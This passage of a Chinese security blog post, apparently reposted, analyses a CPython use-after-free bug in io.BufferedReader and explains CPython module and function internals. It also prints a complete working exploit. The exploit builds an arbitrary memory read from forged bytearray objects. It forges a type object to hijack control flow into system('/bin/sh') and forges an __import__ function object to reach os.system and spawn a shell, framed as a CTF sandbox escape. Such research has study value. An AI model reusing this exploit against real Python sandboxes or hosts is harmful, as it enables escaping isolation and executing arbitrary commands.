还有一个需要解决的是传参问题，Python在调用对象方法时，第一个参数是对象本身，是一个PyObject*，作者利用这点，将obj->ob_refcnt的值设置为"/bin/sh"，这样第一个参数就相当于是char*传递给system了，在64位下，ob_refcnt的长度是8字节，而/bin/sh\x00的长度也正好为8，没有超过，否则就覆盖了obj->ob_type的值了。（PS:在调用对象方法时，会使得obj->ob_refcnt+1，所以第一个字节"/"(\x2f)需要减1，也就是\x2e了）

作者的exp如下

class Exploit:
    """Control-flow step: makes attribute lookup on a forged object call ``addr``."""

    def set_rip(self, addr, obj_refcount=0x10):
        """Set rip by using a fake object and associated type object.

        ``addr`` is the code address to reach. ``obj_refcount`` is the 8-byte
        value stored in the fake object's first field, which is also what the
        called function receives a pointer to. Any exception raised while
        triggering is swallowed on purpose.
        """
        # Fake type object
        # NOTE(review): the fake object's type pointer below is id(type_obj),
        # i.e. the bytes object's own header, so this payload begins 32 bytes
        # into the fake type. With the struct _typeobject layout that puts
        # the first copy of addr at offset 32 + 8 + 0x68 = 144, which appears
        # to be tp_getattro on a 64-bit build -- confirm.
        type_obj = flat(
            p64(0xac1dc0de),    # filler word at the start of the payload
            b'X'*0x68,          # padding
            p64(addr)*100,      # vtable funcs
        )
        self.no_gc.append(type_obj)

        # Fake PyObject
        data = flat(
            p64(obj_refcount),  # refcount
            p64(id(type_obj)),  # pointer to fake type object
        )
        self.no_gc.append(data)

        # The bytes data starts at offset 32 in the object 
        self.freed_buffer[0] = id(data) + 32

        try:
            # Now we trigger it. This calls tp_getattro on our fake type object
            self.fake_objs[0].trigger
        except:
            # Avoid messy error output when we exit our shell
            pass


# The refcount field doubles as the string handed to system(). Its first byte
# is 0x2e ('/' minus one) because the refcount is incremented before the call,
# turning the 8 bytes into "/bin/sh\0".
e.set_rip(system, obj_refcount=u64(b'\x2ebin/sh\x00'))

4.3 彩蛋

UAF漏洞是需要io.RawIOBase，因此需要io模块，但作者没有使用import，而是用io=open.__self__替代。

open.__self__对应的io模块其实是_io，这个是Python内置的模块，而import io导入的io模块是PYTHON_HOME\lib\io.py，这个io其实就是对_io模块的封装，io.RawIOBase就是对_io._RawIOBase的封装了。

那么open.__self__为什么就是_io模块呢，这就是本篇彩蛋的内容了。

open是PyCFunctionObject结构体对象。

_io是PyModuleObject结构体对象。

4.3.1 self是什么

根据源码，可以知道self是PyCFunctionObject的m_self，但是这个值哪儿来呢，需要去看一下_io模块的初始化。

//3.10.4
//Include\cpython\methodobject.h
typedef struct {
    PyObject_HEAD
    PyMethodDef *m_ml; /* Description of the C function to call */
    PyObject    *m_self; /* Passed as 'self' arg to the C func, can be NULL */
    PyObject    *m_module; /* The __module__ attribute, can be anything */
    PyObject    *m_weakreflist; /* List of weak references */
    vectorcallfunc vectorcall;
} PyCFunctionObject;

#define PyCFunction_GET_SELF(func) \
        (((PyCFunctionObject *)func) -> m_ml -> ml_flags & METH_STATIC ? \
         NULL : ((PyCFunctionObject *)func) -> m_self)

//Objects\methodobject.c
static PyObject *
meth_get__self__(PyCFunctionObject *m, void *closure)
{
    PyObject *self;

    self = PyCFunction_GET_SELF(m);
    if (self == NULL)
        self = Py_None;
    Py_INCREF(self);
    return self;
}

static PyGetSetDef meth_getsets [] = {
    {"__doc__",  (getter)meth_get__doc__,  NULL, NULL},
    {"__name__", (getter)meth_get__name__, NULL, NULL},
    {"__qualname__", (getter)meth_get__qualname__, NULL, NULL},
    {"__self__", (getter)meth_get__self__, NULL, NULL},
    {"__text_signature__", (getter)meth_get__text_signature__, NULL, NULL},
    {0}
};

4.3.2 内置_io模块的初始化

看下PyModuleObject结构体的定义。

//3.10.4
//Include\internal\pycore_moduleobject.h
typedef struct {
    PyObject_HEAD
    PyObject *md_dict;
    struct PyModuleDef *md_def;
    void *md_state;
    PyObject *md_weaklist;
    // for logging purposes after md_dict is cleared
    PyObject *md_name;
} PyModuleObject;

PyModuleObject和PyCFunctionObject都有一个描述自身的结构体，分别是PyModuleDef、PyMethodDef。

//3.10.4
//Include\moduleobject.h
typedef struct PyModuleDef{
  PyModuleDef_Base m_base;
  const char* m_name;
  const char* m_doc;
  Py_ssize_t m_size;
  PyMethodDef *m_methods;
  struct PyModuleDef_Slot* m_slots;
  traverseproc m_traverse;
  inquiry m_clear;
  freefunc m_free;
} PyModuleDef;

//Include\methodobject.h
struct PyMethodDef {
    const char  *ml_name;   /* The name of the built-in function/method */
    PyCFunction ml_meth;    /* The C function that implements it */
    int         ml_flags;   /* Combination of METH_xxx flags, which mostly
                               describe the args expected by the C func */
    const char  *ml_doc;    /* The __doc__ attribute, or NULL */
};
typedef struct PyMethodDef PyMethodDef;

基本结构体说完了，来看_io模块的初始化函数，_PyIO_Module是_io的描述，里面包含了PyMethodDef module_methods，其中就有open方法的描述_IO_OPEN_METHODDEF。

//3.10.4
//Modules\_io\_iomodule.c
PyMODINIT_FUNC
PyInit__io(void)
{
    PyObject *m = PyModule_Create(&_PyIO_Module);
    ......
}

//Include\modsupport.h
#ifdef Py_LIMITED_API
#define PyModule_Create(module) \
        PyModule_Create2(module, PYTHON_ABI_VERSION)
#else
#define PyModule_Create(module) \
        PyModule_Create2(module, PYTHON_API_VERSION)
#endif

//Modules\_io\clinic\_iomodule.c.h
#define _IO_OPEN_METHODDEF    \
    {"open", (PyCFunction)(void(*)(void))_io_open, METH_FASTCALL|METH_KEYWORDS, _io_open__doc__},

//Modules\_io\_iomodule.c
static PyMethodDef module_methods[] = {
    _IO_OPEN_METHODDEF
    _IO_TEXT_ENCODING_METHODDEF
    _IO_OPEN_CODE_METHODDEF
    {NULL, NULL}
};

struct PyModuleDef _PyIO_Module = {
    PyModuleDef_HEAD_INIT,
    "io",
    module_doc,
    sizeof(_PyIO_State),
    module_methods,
    NULL,
    iomodule_traverse,
    iomodule_clear,
    (freefunc)iomodule_free,
};

现在来看下具体的PyModule_Create2函数：

在_PyModule_CreateInitialized函数中根据模块名称，使用PyModule_New创建了一个模块对象m；
调用PyModule_AddFunctions为m添加方法，module->m_methods则是方法描述数组，其中就有open方法描述_IO_OPEN_METHODDEF；
在函数_add_methods_to_object中会遍历模块包含的方法描述符数组，为每个PyMethodDef对象，调用PyCFunction_NewEx来创建一个PyCFunctionObject对象，传入的第2个参数module就是_io模块对象了，第3个参数是表示_io模块的名称。

//Objects\moduleobject.c
PyObject *
PyModule_Create2(struct PyModuleDef* module, int module_api_version)
{
    if (!_PyImport_IsInitialized(_PyInterpreterState_GET())) {
        PyErr_SetString(PyExc_SystemError,
                        "Python import machinery not initialized");
        return NULL;
    }
    return _PyModule_CreateInitialized(module, module_api_version);
}

PyObject *
_PyModule_CreateInitialized(struct PyModuleDef* module, int module_api_version)
{
    const char* name;
    PyModuleObject *m;
    .....
    name = module->m_name;
    ......
    if ((m = (PyModuleObject*)PyModule_New(name)) == NULL)
        return NULL;
    ......
    if (module->m_methods != NULL) {
        if (PyModule_AddFunctions((PyObject *) m, module->m_methods) != 0) {
            Py_DECREF(m);
            return NULL;
        }
    }
    ......
}

int
PyModule_AddFunctions(PyObject *m, PyMethodDef *functions)
{
    int res;
    PyObject *name = PyModule_GetNameObject(m);
    if (name == NULL) {
        return -1;
    }

    res = _add_methods_to_object(m, name, functions);
    Py_DECREF(name);
    return res;
}

static int
_add_methods_to_object(PyObject *module, PyObject *name, PyMethodDef *functions)
{
    PyObject *func;
    PyMethodDef *fdef;

    for (fdef = functions; fdef->ml_name != NULL; fdef++) {
        if ((fdef->ml_flags & METH_CLASS) ||
            (fdef->ml_flags & METH_STATIC)) {
            PyErr_SetString(PyExc_ValueError,
                            "module functions cannot set"
                            " METH_CLASS or METH_STATIC");
            return -1;
        }
        func = PyCFunction_NewEx(fdef, (PyObject*)module, name);
        if (func == NULL) {
            return -1;
        }
        if (PyObject_SetAttrString(module, fdef->ml_name, func) != 0) {
            Py_DECREF(func);
            return -1;
        }
        Py_DECREF(func);
    }

    return 0;
}

再看下PyCFunction_NewEx，第二个参数就是SELF，赋值给了m_self，所以也就解答了open.__self__是_io模块对象的原因了。

//Include\methodobject.h
#define PyCFunction_NewEx(ML, SELF, MOD) PyCMethod_New((ML), (SELF), (MOD), NULL)

//Objects\methodobject.c
PyObject *
PyCMethod_New(PyMethodDef *ml, PyObject *self, PyObject *module, PyTypeObject *cls)
{
    /* Figure out correct vectorcall function to use */
    vectorcallfunc vectorcall;
    switch (ml->ml_flags & (METH_VARARGS | METH_FASTCALL | METH_NOARGS |
                            METH_O | METH_KEYWORDS | METH_METHOD))
    {
        case METH_VARARGS:
        case METH_VARARGS | METH_KEYWORDS:
            /* For METH_VARARGS functions, it's more efficient to use tp_call
             * instead of vectorcall. */
            vectorcall = NULL;
            break;
        case METH_FASTCALL:
            vectorcall = cfunction_vectorcall_FASTCALL;
            break;
        case METH_FASTCALL | METH_KEYWORDS:
            vectorcall = cfunction_vectorcall_FASTCALL_KEYWORDS;
            break;
        case METH_NOARGS:
            vectorcall = cfunction_vectorcall_NOARGS;
            break;
        case METH_O:
            vectorcall = cfunction_vectorcall_O;
            break;
        case METH_METHOD | METH_FASTCALL | METH_KEYWORDS:
            vectorcall = cfunction_vectorcall_FASTCALL_KEYWORDS_METHOD;
            break;
        default:
            PyErr_Format(PyExc_SystemError,
                         "%s() method: bad call flags", ml->ml_name);
            return NULL;
    }

    PyCFunctionObject *op = NULL;

    if (ml->ml_flags & METH_METHOD) {
        if (!cls) {
            PyErr_SetString(PyExc_SystemError,
                            "attempting to create PyCMethod with a METH_METHOD "
                            "flag but no class");
            return NULL;
        }
        PyCMethodObject *om = PyObject_GC_New(PyCMethodObject, &PyCMethod_Type);
        if (om == NULL) {
            return NULL;
        }
        Py_INCREF(cls);
        om->mm_class = cls;
        op = (PyCFunctionObject *)om;
    } else {
        if (cls) {
            PyErr_SetString(PyExc_SystemError,
                            "attempting to create PyCFunction with class "
                            "but no METH_METHOD flag");
            return NULL;
        }
        op = PyObject_GC_New(PyCFunctionObject, &PyCFunction_Type);
        if (op == NULL) {
            return NULL;
        }
    }

    op->m_weakreflist = NULL;
    op->m_ml = ml;
    Py_XINCREF(self);
    op->m_self = self;
    Py_XINCREF(module);
    op->m_module = module;
    op->vectorcall = vectorcall;
    _PyObject_GC_TRACK(op);
    return (PyObject *)op;
}

在学习彩蛋的过程中想到，python中自带的__builtins__也是一个PyModuleObject，而__import__则是__builtins__模块的方法，因此通过__builtins__模块的PyModuleObject->md_def->m_methods去找到__import__的方法描述，再伪造一个__import__的PyCFunctionObject结构体数据，最后利用memoryview指向该伪造数据，通过list对象即可使用__import__方法了。

5.1 寻找import的方法描述

按照PyModuleObject->md_def->m_methods，可以遍历PyMethodDef数组，读取PyMethodDef->ml_name，来判断是不是__import__。（PS:p是原exp中的Exploit对象）

def find_import_def(p):
    """Locate the method-table entry describing ``__import__``.

    Follows ``__builtins__`` -> ``md_def`` -> ``m_methods`` using the
    arbitrary-read primitive ``p.leak(addr, length)`` and walks the method
    table one 0x20-byte entry at a time.

    Returns the address (int) of the entry whose name reads ``__import__``.
    If an entry with a null name pointer is reached first, returns ``b""``.
    """
    entry_size = 0x20

    # Module object: the pointer at offset 0x18 is treated as md_def.
    module_raw = p.leak(id(__builtins__), 0x40)
    moddef_addr = u64(module_raw[0x18:0x20])

    # Module definition: the pointer at offset 0x40 is treated as m_methods.
    moddef_raw = p.leak(moddef_addr, 0x48)
    table_addr = u64(moddef_raw[0x40:0x48])

    entry_addr = table_addr
    while True:
        entry_raw = p.leak(entry_addr, 0x20)
        name_ptr = u64(entry_raw[0:8])
        if name_ptr == 0:
            # A null ml_name ends the walk without a match.
            return b""
        # Only the first 10 bytes of the name are read and compared.
        if p.leak(name_ptr, 10) == b'__import__':
            return entry_addr
        entry_addr += entry_size

5.2 伪造import方法对象

ob_type可以通过内置方法的类型来获取，id、dir、open、len都可以；m_ml是上一步找到的__import__方法描述的地址；m_self根据彩蛋可知就是__builtins__模块对象；其他属性赋值为0即可。

def fake_import(cmd):
    """Forge a callable ``__import__`` object and use it to run ``cmd``.

    Builds an ``Exploit`` instance, looks up the ``__import__`` method-table
    entry with ``find_import_def``, lays out raw bytes shaped like a builtin
    function object that points at that entry, and redirects slot 0 of the
    dangling view to those bytes.  The forged object is then called with
    ``"os"`` and ``cmd`` is passed to the returned object's ``system``.

    cmd: command string handed to ``os.system``.
    """
    p = Exploit()
    import_PyMethodDef_addr = find_import_def(p)
    # Offsets in the trailing comments are relative to the start of the
    # forged object.
    byte_array_obj = flat(
            p64(10),            # refcount
            p64(id(type(len))), # ob_type: type of a builtin function (id, dir, open, len all work)
            p64(import_PyMethodDef_addr),          # PyMethodDef *m_ml             0x10
            p64(id(__builtins__)),          # PyObject    *m_self           0x18
            p64(0x0),          # PyObject    *m_module         0x20
            p64(0x0),          # PyObject    *m_weakreflist    0x28
            p64(0x0),           # vectorcallfunc vectorcall     0x30
        )
    # The local name byte_array_obj keeps the payload referenced while it is
    # used below.  NOTE(review): +32 presumably skips the bytes object header
    # so the pointer lands on the payload - confirm against PyBytesObject.
    p.freed_buffer[0] = id(byte_array_obj)+32
    # fake_objs[0] is read back as the forged function and called like
    # __import__("os").
    os = p.fake_objs[0]("os")
    os.system(cmd)

5.3 总结

该漏洞可能只能用于CTF中的Python沙箱逃逸。利用该漏洞可以执行命令，但前提是open方法没有被删除，而open一般会被作为危险方法删除，所以实在想不出这个漏洞有多好的利用方式，就权当好玩吧。

附上最终的exp

# Obtain the I/O module object through the builtin ``open`` function's
# ``__self__`` attribute rather than an ``import`` statement; the script
# reaches ``_RawIOBase`` and ``BufferedReader`` through this name.
# NOTE(review): presumably this is the C-level ``_io`` module - confirm.
io = open.__self__
def uN(b):
    """Decode a little-endian byte sequence of any length into an int.

    Each element is masked to its low 8 bits and placed at bit position
    ``8 * index``; an empty sequence decodes to 0.
    """
    return sum((byte & 0xff) << (pos * 8) for pos, byte in enumerate(b))

def u64(x):
    """Decode an 8-byte little-endian buffer into an unsigned integer.

    Asserts that ``x`` holds exactly 8 bytes, then delegates to ``uN``.
    """
    expected_len = 8
    assert len(x) == expected_len
    return uN(x)

def u32(x):
    """Decode a 4-byte little-endian buffer into an unsigned integer.

    Asserts that ``x`` holds exactly 4 bytes, then delegates to ``uN``.
    """
    expected_len = 4
    assert len(x) == expected_len
    return uN(x)

def u16(x):
    """Decode a 2-byte little-endian buffer into an unsigned integer.

    Asserts that ``x`` holds exactly 2 bytes, then delegates to ``uN``.
    """
    expected_len = 2
    assert len(x) == expected_len
    return uN(x)


def p64(x):
    """Pack an unsigned 64-bit integer into 8 little-endian bytes.

    x: integer in the range ``0 <= x < 2**64``.

    Returns a ``bytearray`` of exactly 8 bytes, least significant byte
    first.

    Raises ValueError when ``x`` is negative or does not fit in 64 bits.
    Without this check a negative value would be packed as eight zero
    bytes and an oversized value would yield more than 8 bytes, silently
    shifting every field that follows it in a packed structure.
    """
    if not 0 <= x <= 0xffffffffffffffff:
        raise ValueError("p64() argument out of 64-bit range: %r" % (x,))
    packed = bytearray()
    while x > 0:
        packed.append(x & 0xff)
        x >>= 8
    # Pad the high-order side with zero bytes up to the fixed 8-byte width.
    return packed.ljust(8, b'\0')

def flat(*args):
    """Concatenate the given bytes-like chunks into a single ``bytes`` object."""
    chunks = args
    return bytes().join(chunks)

class File(io._RawIOBase):
    """Raw stream whose ``readinto`` keeps the buffer it is handed.

    The buffer object is stored in the module-level global ``view`` so it
    remains reachable after the call returns.
    """

    def readable(self):
        """Report the stream as readable."""
        return True

    def readinto(self, buf):
        """Store ``buf`` in the global ``view``; no data is written into it."""
        global view
        view = buf
        return None


class Exploit:
    """Memory-read primitive built on the buffer captured by ``File.readinto``.

    Attributes set by ``__init__``:
      freed_buffer: the captured view, cast to pointer-sized items.
      fake_objs:    a list with one ``None`` slot per item of that view.
      no_gc:        list holding forged payloads so they stay referenced.

    NOTE(review): the code relies on the storage behind ``fake_objs``
    overlapping the memory ``freed_buffer`` still points at, so that writing
    ``freed_buffer[0]`` changes what ``fake_objs[0]`` refers to - confirm
    against the allocator behaviour of the targeted CPython build.
    """
    def _create_fake_byte_array(self, addr, size):
        """Forge a bytearray header covering ``size`` bytes at ``addr``.

        The header is assembled as raw bytes, kept alive via ``no_gc``, and
        its address is written into slot 0 of ``freed_buffer``.
        """
        byte_array_obj = flat(
            p64(10),            # refcount
            p64(id(bytearray)), # type obj
            p64(size),          # ob_size
            p64(size),          # ob_alloc
            p64(addr),          # ob_bytes
            p64(addr),          # ob_start
            p64(0x0),           # ob_exports
        )
        self.no_gc.append(byte_array_obj)  # stop gc from freeing after return
        # NOTE(review): +32 presumably skips the bytes object header so the
        # pointer lands on the payload - confirm against PyBytesObject.
        self.freed_buffer[0] = id(byte_array_obj) + 32

    def leak(self, addr, length):
        """Return ``length`` bytes read from address ``addr``.

        Installs a forged bytearray spanning the target range, then slices
        it through ``fake_objs[0]``.
        """
        self._create_fake_byte_array(addr, length)
        return self.fake_objs[0][0:length]


    def __init__(self):
        """Trigger the bug and set up ``fake_objs``, ``freed_buffer``, ``no_gc``."""
        # Trigger bug
        global view
        # Reading through a BufferedReader makes File.readinto run, which
        # stores the buffer it receives in the global ``view``.
        f = io.BufferedReader(File())
        f.read(1)
        # Drop the reader while ``view`` still refers to its buffer.
        del f
        # 'P' reinterprets the view as pointer-sized items.
        view = view.cast('P')

        # Allocated right after the reader is released, with one slot per
        # pointer in the view.
        self.fake_objs = [None] * len(view)
        self.freed_buffer = view
        self.no_gc = []

def print_hex(data):
    """Print the integer ``data`` in hexadecimal (``0x``-prefixed) form."""
    rendered = hex(data)
    print(rendered)

def find_import_def(p):
    """Locate the method-table entry describing ``__import__``.

    Follows ``__builtins__`` -> ``md_def`` -> ``m_methods`` using the
    arbitrary-read primitive ``p.leak(addr, length)`` and walks the method
    table one 0x20-byte entry at a time.

    Returns the address (int) of the entry whose name reads ``__import__``.
    If an entry with a null name pointer is reached first, returns ``b""``.
    """
    entry_size = 0x20

    # Module object: the pointer at offset 0x18 is treated as md_def.
    module_raw = p.leak(id(__builtins__), 0x40)
    moddef_addr = u64(module_raw[0x18:0x20])

    # Module definition: the pointer at offset 0x40 is treated as m_methods.
    moddef_raw = p.leak(moddef_addr, 0x48)
    table_addr = u64(moddef_raw[0x40:0x48])

    entry_addr = table_addr
    while True:
        entry_raw = p.leak(entry_addr, 0x20)
        name_ptr = u64(entry_raw[0:8])
        if name_ptr == 0:
            # A null ml_name ends the walk without a match.
            return b""
        # Only the first 10 bytes of the name are read and compared.
        if p.leak(name_ptr, 10) == b'__import__':
            return entry_addr
        entry_addr += entry_size

def fake_import(cmd):
    """Forge a callable ``__import__`` object and use it to run ``cmd``.

    Builds an ``Exploit`` instance, looks up the ``__import__`` method-table
    entry with ``find_import_def``, lays out raw bytes shaped like a builtin
    function object that points at that entry, and redirects slot 0 of the
    dangling view to those bytes.  The forged object is then called with
    ``"os"`` and ``cmd`` is passed to the returned object's ``system``.

    cmd: command string handed to ``os.system``.
    """
    p = Exploit()
    import_PyMethodDef_addr = find_import_def(p)
    # Offsets in the trailing comments are relative to the start of the
    # forged object.
    byte_array_obj = flat(
            p64(10),            # refcount
            p64(id(type(len))), # ob_type: type of a builtin function (id, dir, len all work)
            p64(import_PyMethodDef_addr),          # PyMethodDef *m_ml             0x10
            p64(id(__builtins__)),          # PyObject    *m_self           0x18
            p64(0x0),          # PyObject    *m_module         0x20
            p64(0x0),          # PyObject    *m_weakreflist    0x28
            p64(0x0),           # vectorcallfunc vectorcall     0x30
        )
    # The local name byte_array_obj keeps the payload referenced while it is
    # used below.  NOTE(review): +32 presumably skips the bytes object header
    # so the pointer lands on the payload - confirm against PyBytesObject.
    p.freed_buffer[0] = id(byte_array_obj)+32
    # fake_objs[0] is read back as the forged function and called like
    # __import__("os").
    os = p.fake_objs[0]("os")
    os.system(cmd)

# Remove the real __import__ from the builtins namespace first, so the demo
# shows that the forged function object alone is enough to import ``os``.
del __builtins__.__dict__['__import__']
# Run the whole chain and hand "/bin/sh" to os.system.
fake_import("/bin/sh")

文章来源: https://xz.aliyun.com/t/11399
如有侵权请联系:admin#unsafe.sh